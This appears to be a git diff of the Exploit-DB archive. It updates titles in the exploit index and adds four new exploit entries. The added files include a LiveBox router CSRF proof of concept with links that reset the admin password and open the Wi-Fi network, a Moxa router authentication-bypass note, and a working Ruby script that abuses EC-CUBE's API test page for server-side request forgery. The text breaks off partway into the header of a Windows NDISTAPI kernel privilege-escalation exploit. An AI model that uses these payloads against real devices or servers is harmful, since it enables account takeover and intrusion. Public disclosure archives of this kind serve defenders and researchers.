 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0
@@ -35197,7 +35197,7 @@ id,file,description,date,author,platform,type,port
 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80
 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80
 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0
-38843,platforms/php/webapps/38843.txt,"TomatoCart - 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0
+38843,platforms/php/webapps/38843.txt,"TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion",2013-11-18,Esac,php,webapps,0
 38835,platforms/multiple/local/38835.py,"Centos 7.1 / Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0
 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0
 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0
@@ -35222,7 +35222,7 @@ id,file,description,date,author,platform,type,port
 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0
 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0
 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0
-38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
+38865,platforms/php/webapps/38865.txt,"NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0
 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <= 11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80
 38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0
 38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0
@@ -35247,9 +35247,9 @@ id,file,description,date,author,platform,type,port
 38887,platforms/php/webapps/38887.txt,"iScripts AutoHoster - /additionalsettings.php cmbdomain Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
 38888,platforms/php/webapps/38888.txt,"iScripts AutoHoster - /payinvoiceothers.php invno Parameter SQL Injection",2013-12-15,i-Hmx,php,webapps,0
 38889,platforms/php/webapps/38889.txt,"iScripts AutoHoster - /support/parser/main_smtp.php Unspecified Traversal",2013-12-15,i-Hmx,php,webapps,0
-38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38890,platforms/php/webapps/38890.txt,"iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
-38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38891,platforms/php/webapps/38891.txt,"iScripts AutoHoster - 'fname' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
-38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
+38892,platforms/php/webapps/38892.txt,"iScripts AutoHoster - 'id' Parameter Local File Inclusion",2013-12-15,i-Hmx,php,webapps,0
 38895,platforms/php/webapps/38895.txt,"SIMOGEO FileManager 2.3.0 - Multiple Vulnerabilities",2015-12-08,HaHwul,php,webapps,80
 38896,platforms/xml/webapps/38896.py,"OpenMRS 2.3 (1.11.4) - XML External Entity (XXE) Processing Exploit",2015-12-08,LiquidWorm,xml,webapps,0
 38897,platforms/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,xml,webapps,0
@@ -35276,9 +35276,9 @@ id,file,description,date,author,platform,type,port
 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0
 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0
 40437,platforms/java/webapps/40437.txt,"Symantec Messaging Gateway 10.6.1 - Directory Traversal",2016-09-28,R-73eN,java,webapps,0
-38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38920,platforms/php/webapps/38920.txt,"AFCommerce - 'adblock.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
-38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38921,platforms/php/webapps/38921.txt,"AFCommerce - 'adminpassword.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
-38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
+38922,platforms/php/webapps/38922.txt,"AFCommerce - 'controlheader.php' Remote File Inclusion",2013-12-25,NoGe,php,webapps,0
 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0
 38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
@@ -35292,7 +35292,7 @@ id,file,description,date,author,platform,type,port
 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0
 38936,platforms/php/webapps/38936.txt,"WordPress Plugin Advanced Dewplayer - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0
 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0
-38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0
+38938,platforms/php/webapps/38938.txt,"xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0
 38939,platforms/multiple/dos/38939.c,"VideoLAN VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0
 38940,platforms/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0
 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0
@@ -35385,7 +35385,7 @@ id,file,description,date,author,platform,type,port
 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
-39032,platforms/php/webapps/39032.txt,"BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0
 39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80
 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80
 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0
@@ -35446,7 +35446,7 @@ id,file,description,date,author,platform,type,port
 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0
 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0
 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
-39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
+39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - 'code.php' Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39100,platforms/php/webapps/39100.txt,"WordPress Plugin NextGEN Gallery - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0
 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'Uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0
 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0
@@ -35468,12 +35468,12 @@ id,file,description,date,author,platform,type,port
 39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
 39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
-39124,platforms/php/webapps/39124.txt,"MeiuPic - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
+39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0
 39125,platforms/windows/dos/39125.html,"Kaspersky Internet Security - Remote Denial of Service",2014-03-20,CXsecurity,windows,dos,0
 39126,platforms/php/webapps/39126.txt,"BigACE Web CMS 2.7.5 - '/public/index.php' LANGUAGE Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0
 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0
 39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0
-39129,platforms/php/webapps/39129.txt,"qEngine - 'run' Parameter Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
+39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0
 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0
 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
@@ -35590,15 +35590,15 @@ id,file,description,date,author,platform,type,port
 39245,platforms/php/webapps/39245.txt,"Roundcube 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39246,platforms/php/webapps/39246.txt,"mcart.xls Bitrix Module 6.5.2 - SQL Injection",2016-01-15,"High-Tech Bridge SA",php,webapps,80
 39250,platforms/php/webapps/39250.txt,"WordPress Plugin DZS-VideoGallery - Cross-Site Scripting / Command Injection",2014-07-13,MustLive,php,webapps,0
-39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0
+39251,platforms/php/webapps/39251.txt,"WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion",2014-05-28,"Anant Shrivastava",php,webapps,0
 39252,platforms/php/webapps/39252.txt,"WordPress Plugin WP Rss Poster - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
 39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
 39254,platforms/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0
 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0
 39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
 39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
-39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
+39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
-39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
+39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
 39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80
 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80
@@ -35612,7 +35612,7 @@ id,file,description,date,author,platform,type,port
 39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0
 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0
 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0
-39272,platforms/php/webapps/39272.txt,"CMSimple - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
+39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote file Inclusion",2014-07-28,"Govind Singh",php,webapps,0
 39273,platforms/php/webapps/39273.txt,"CMSimple - /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
@@ -35621,7 +35621,7 @@ id,file,description,date,author,platform,type,port
 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote,0
 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0
-39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'action' Parameter Local File Inclusion",2014-08-08,0x4148,php,webapps,0
+39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0
 39282,platforms/php/webapps/39282.txt,"WordPress Plugin GB Gallery Slideshow - 'wp-admin/admin-ajax.php' SQL Injection",2014-08-11,"Claudio Viviani",php,webapps,0
 39283,platforms/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0
 39284,platforms/windows/local/39284.txt,"Oracle - HtmlConverter.exe Buffer Overflow",2016-01-21,hyp3rlinx,windows,local,0
@@ -36340,7 +36340,7 @@ id,file,description,date,author,platform,type,port
 40042,platforms/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80
 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,cgi,webapps,443
-40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
+40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80
 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80
 40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0
@@ -36391,7 +36391,7 @@ id,file,description,date,author,platform,type,port
 40181,platforms/linux/dos/40181.c,"AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak",2016-07-29,"Google Security Research",linux,dos,0
 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80
 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
-40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
+40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80
 40128,platforms/lin_x86/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,lin_x86,shellcode,0
@@ -36479,7 +36479,7 @@ id,file,description,date,author,platform,type,port
 40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
 40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
-40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
+40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
 40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
@@ -36721,3 +36721,7 @@ id,file,description,date,author,platform,type,port
 40618,platforms/windows/dos/40618.py,"Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)",2016-10-21,"sultan albalawi",windows,dos,0
 40619,platforms/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote,0
 40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0
+40626,platforms/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps,0
+40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
+40628,platforms/php/webapps/40628.pl,"EC-CUBE 2.12.6 - Server-Side Request Forgery",2016-10-24,Wadeek,php,webapps,0
+40629,platforms/hardware/webapps/40629.txt,"Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management",2016-10-24,"Sniper Pex",hardware,webapps,0

platforms/hardware/webapps/40626.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Orange Inventel LiveBox CSRF
+# Google Dork: N/A
+# Date: 10-24-2016
+# Exploit Author: BlackMamba TEAM (BM1)
+# Vendor Homepage: N/A
+# Version: Inventel - v5.08.3-sp
+# Tested on: Windows 7 64bit
+# CVE : N/A
+# Category: Hardware
+
+1. Description
+This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator.
+and thus change the admin password (without the need to know the old one).
+this affects the other  settings too (SSID name , SSID Security ,enabling disabling the firewall.......).
+
+2. Proof of Concept
+this link once clicked the admin password is changed to "blackmamba" (withouth ")
+
+<a href="http://192.168.1.1/configok.cgi?sysPassword=blackmamba">Cats !!!</a>
+
+this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network)
+<a href="http://192.168.1.1/advancedboot.cgi?associateTime=10&wifiEssid=BLACKMAMBA&wifiWep=0">Dogs :D !!!</a>
+
+3. Mitigation
+this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface.
+
+------------------------------------------------------------------------------------------------------------------------------------------------------------
+From the Moroccan team : BLACK MAMBA (by BM1)

platforms/hardware/webapps/40629.txt

@@ -0,0 +1,38 @@
+Title: Industrial Secure Routers - Insecure Configuration Management
+Type: Local/Remote
+Author: Nassim Asrir
+Author Company: HenceForth
+Impact: Insecure Configuration Management
+Risk: (4/5)
+Release Date: 22.10.2016
+
+Summary:
+Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
+The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically 
+designed for automation networks,which protects the integrity of remote access and critical devices.
+
+description:
+
+Using this Vulnerability we can change the Admin configuration without knowing Password & Username
+
+Because the form for change the configurations is Insecure.
+
+Vendor:
+http://www.moxa.com/product/Industrial_Secure_Routers.htm
+
+Affected Version:
+EDR-810, EDR-G902 and EDR-G903
+
+Tested On:
+Linux // Dist (Bugtraq 2)
+
+Vendor Status:
+I told them and i wait for the answer.
+
+PoC:
+- when you navigate the server automatically you redirect to the login page (http://site/login.asp).
+
+- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.
+
+Credits
+Vulnerability discovered by Nassim Asrir  - <wassline@gmail.com>

platforms/php/webapps/40628.pl

@@ -0,0 +1,89 @@
+# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
+# Date: 22/10/16
+# Exploit Author: Wad Deek
+# Vendor Homepage: http://en.ec-cube.net/
+# Software Link: http://en.ec-cube.net/download/
+# Version: 2.12.6en-p1
+# Tested on: Xampp on Windows7
+# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
+##
+##
+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+require('mechanize')
+agent = Mechanize.new()
+agent.read_timeout = 3
+agent.open_timeout = 3
+agent.keep_alive = false
+agent.redirect_ok = true
+agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+#===========================
+urls = <<URLS
+http://localhost/eccube/
+URLS
+urls.split("\n").each() do |url|
+#===========================
+#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
+def get(agent, target)
+begin
+response = agent.get(target)
+code = response.code()
+body = response.body()
+rescue
+else
+return code, body
+end
+end
+#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
+#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+target = url+"test/api_test.php"
+code, body = get(agent, target)
+if(code == "200" && body.include?("EC-CUBE API TEST") == true)
+begin
+response = agent.post(
+target,
+{
+"AccessKeyId" => 4111111111111111,
+"arg_key0" => 1,
+"arg_key1" => 1,
+"arg_key2" => 1,
+"arg_key3" => 1,
+"arg_key4" => 1,
+"arg_key5" => 1,
+"arg_key6" => 1,
+"arg_key7" => 1,
+"arg_key8" => 1,
+"arg_key9" => 1,
+"arg_val0" => 1,
+"arg_val1" => 1,
+"arg_val2" => 1,
+"arg_val3" => 1,
+"arg_val4" => 1,
+"arg_val5" => 1,
+"arg_val6" => 1,
+"arg_val7" => 1,
+"arg_val8" => 1,
+"arg_val9" => 1,
+#????????????????????????????????????????????????????????????
+"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
+#????????????????????????????????????????????????????????????
+"mode=" => "",
+"Operation" => 1,
+"SecretKey" => 1,
+"Service" => 1,
+"Signature" => 1,
+"Timestamp" => 1,
+"type" => "index.php"
+})
+body = response.body()
+rescue
+else
+ip = response.body().scan(/IP : (.+?)</).join()
+puts("[+] "+target+" >>>> monip.org >>>> "+ip)
+end
+end
+#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+#===========================
+end
+#===========================
+

platforms/windows/local/40627.c

@@ -0,0 +1,538 @@
+/*
+################################################################
+# Exploit Title: Windows x86 (all versions) NDISTAPI privilege escalation (MS11-062)
+# Date: 2016-10-24
+# Exploit Author: Tomislav Paskalev
+# Vulnerable Software:
+#   Windows XP SP3 x86
+#   Windows XP Pro SP2 x64
+#   Windows Server 2003 SP2 x86
+#   Windows Server 2003 SP2 x64
+#   Windows Server 2003 SP2 Itanium-based Systems 
+# Supported Vulnerable Software:
+#   Windows XP SP3 x86
+#   Windows Server 2003 SP2 x86
+# Tested Software:
+#   Windows XP Pro SP3 x86 EN          [5.1.2600]
+#   Windows Server 2003 Ent SP2 EN     [5.2.3790]
+# CVE ID: 2011-1974
+################################################################
+# Vulnerability description:
+#   An elevation of privilege vulnerability exists in the
+#   NDISTAPI.sys component of the Remote Access Service NDISTAPI
+#   driver. The vulnerability is caused when the NDISTAPI driver
+#   improperly validates user-supplied input when passing data
+#   from user mode to the Windows kernel.
+#   An attacker must have valid logon credentials and be able to
+#   log on locally to exploit the vulnerability.
+#   An attacker who successfully exploited this vulnerability could
+#   run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM
+#   privileges).
+################################################################
+# Exploit notes:
+#   Privileged shell execution:
+#     - the SYSTEM shell will spawn within the invoking shell/process
